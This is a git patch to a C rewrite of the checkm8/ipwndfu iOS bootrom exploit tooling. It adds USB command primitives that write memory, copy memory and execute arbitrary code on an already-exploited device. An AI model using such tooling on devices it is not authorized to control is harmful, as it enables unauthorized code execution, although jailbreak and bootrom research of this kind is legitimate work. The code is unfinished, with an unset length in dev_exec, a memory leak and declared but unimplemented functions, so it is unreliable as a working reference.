From 2be551064f31aa399d56a1375a3b5ffe268a2781 Mon Sep 17 00:00:00 2001
From: Gregor Haas <gregorhaas1997@gmail.com>
Date: Tue, 10 Dec 2019 19:47:48 -0500
Subject: [PATCH] Implemented some commands

---
 checkm8_remote/include/checkm8.h |  6 +-
 checkm8_remote/include/command.h | 13 +++++
 checkm8_remote/src/command.c     | 99 +++++++++++++++++++++++++++++---
 3 files changed, 107 insertions(+), 11 deletions(-)
 create mode 100644 checkm8_remote/include/command.h

diff --git a/checkm8_remote/include/checkm8.h b/checkm8_remote/include/checkm8.h
index feafdbb..0606cda 100644
--- a/checkm8_remote/include/checkm8.h
+++ b/checkm8_remote/include/checkm8.h
@@ -4,8 +4,10 @@
 #include "checkm8_config.h"
 
 #define CHECKM8_SUCCESS         0
-#define CHECKM8_FAIL_NODEV      -1
-#define CHECKM8_FAIL_NOEXP      -2
+#define CHECKM8_FAIL_INVARGS    -1
+#define CHECKM8_FAIL_NODEV      -2
+#define CHECKM8_FAIL_NOEXP      -3
+#define CHECKM8_FAIL_NOTDONE    -4
 
 #define IS_CHECKM8_FAIL(code) code < 0
 
diff --git a/checkm8_remote/include/command.h b/checkm8_remote/include/command.h
new file mode 100644
index 0000000..bc91cf0
--- /dev/null
+++ b/checkm8_remote/include/command.h
@@ -0,0 +1,13 @@
+#ifndef IPWNDFU_REWRITE_C_COMMAND_H
+#define IPWNDFU_REWRITE_C_COMMAND_H
+
+#include "checkm8.h"
+
+int dev_memset(struct pwned_device *dev, long addr, char c, long len);
+int dev_memcpy(struct pwned_device *dev, long dest, long src, long len);
+int dev_exec(struct pwned_device *dev, long response_len, int nargs, long *args);
+
+int dev_read_memory();
+int dev_write_memory();
+
+#endif //IPWNDFU_REWRITE_C_COMMAND_H
diff --git a/checkm8_remote/src/command.c b/checkm8_remote/src/command.c
index fbdb0bf..1325bf2 100644
--- a/checkm8_remote/src/command.c
+++ b/checkm8_remote/src/command.c
@@ -1,8 +1,11 @@
+#include "command.h"
+
 #include "checkm8.h"
 #include "libusb_helpers.h"
-
 #include "libusb.h"
 
+#include "stdlib.h"
+
 void dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
 {
     long index = 0, amount;
@@ -18,29 +21,107 @@ void dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
 
 static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
 
-int command(struct pwned_device *dev, void *data, long data_len, void *response, long response_len)
+struct command_args
+{
+    unsigned long magic;
+    unsigned long arg1;
+    unsigned long arg2;
+    unsigned long arg3;
+    unsigned long arg4;
+    unsigned long arg5;
+    unsigned long arg6;
+    unsigned long arg7;
+
+    long len;
+};
+
+int command(struct pwned_device *dev, struct command_args *args, struct command_args *resp, long response_len)
 {
     int ret = get_device_bundle(dev);
-    if(IS_CHECKM8_FAIL(ret))
-    {
-        return ret;
-    }
+    if(IS_CHECKM8_FAIL(ret)) return ret;
 
     dfu_send_data(dev, nullbuf, 16);
     libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, NULL, 0, 100);
     libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, NULL, 0, 100);
     libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, NULL, 6, 100);
-    dfu_send_data(dev, (unsigned char *) data, data_len);
+    dfu_send_data(dev, (unsigned char *) args, args->len);
 
     if(response_len == 0)
     {
-        libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, response, response_len + 1, 100);
+        libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, (unsigned char *) resp, response_len + 1, 100);
     }
     else
     {
-        libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, response, response_len, 100);
+        libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, (unsigned char *) resp, response_len, 100);
     }
 
     release_device_bundle(dev);
     return CHECKM8_SUCCESS;
+}
+
+#define EXEC_MAGIC 0x6365786563657865ul
+#define MEMC_MAGIC 0x636d656d636d656dul
+#define MEMS_MAGIC 0x736d656d736d656dul
+#define DONE_MAGIC 0x656e6f64656e6f64ul
+
+int dev_memset(struct pwned_device *dev, long addr, char c, long len)
+{
+    int ret;
+    struct command_args *cmd_args, *cmd_resp;
+    cmd_args = calloc(1, sizeof(struct command_args));
+    cmd_resp = calloc(1, sizeof(struct command_args));
+
+    cmd_args->magic = MEMS_MAGIC;
+    cmd_args->arg1 = addr;
+    cmd_args->arg2 = (unsigned long) c;
+    cmd_args->arg3 = len;
+    cmd_args->len = 16;
+
+    ret = command(dev, cmd_args, cmd_resp, 0);
+    free(cmd_args);
+    free(cmd_resp);
+
+    return ret;
+}
+
+int dev_memcpy(struct pwned_device *dev, long dest, long src, long len)
+{
+    int ret;
+    struct command_args *cmd_args, *cmd_resp;
+    cmd_args = calloc(1, sizeof(struct command_args));
+    cmd_resp = calloc(1, sizeof(struct command_args));
+
+    cmd_args->magic = MEMC_MAGIC;
+    cmd_args->arg1 = dest;
+    cmd_args->arg2 = src;
+    cmd_args->arg3 = len;
+    cmd_args->len = 16;
+
+    ret = command(dev, cmd_args, cmd_resp, 0);
+    free(cmd_args);
+    free(cmd_resp);
+
+    return ret;
+}
+
+int dev_exec(struct pwned_device *dev, long response_len, int nargs, long *args)
+{
+    if(nargs > 7) return CHECKM8_FAIL_INVARGS;
+
+    int ret;
+    unsigned long *argbase;
+    struct command_args *cmd_args, *cmd_resp;
+    cmd_args = calloc(1, sizeof(struct command_args));
+    cmd_resp = calloc(1, sizeof(struct command_args));
+
+    cmd_args->magic = EXEC_MAGIC;
+    argbase = &cmd_args->arg1;
+    for(ret = 0; ret < nargs; ret++)
+    {
+        argbase[ret] = args[ret];
+    }
+
+    ret = command(dev, cmd_args, cmd_resp, 16 + response_len);
+    if(cmd_resp->magic != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE;
+    else return ret;
 }
\ No newline at end of file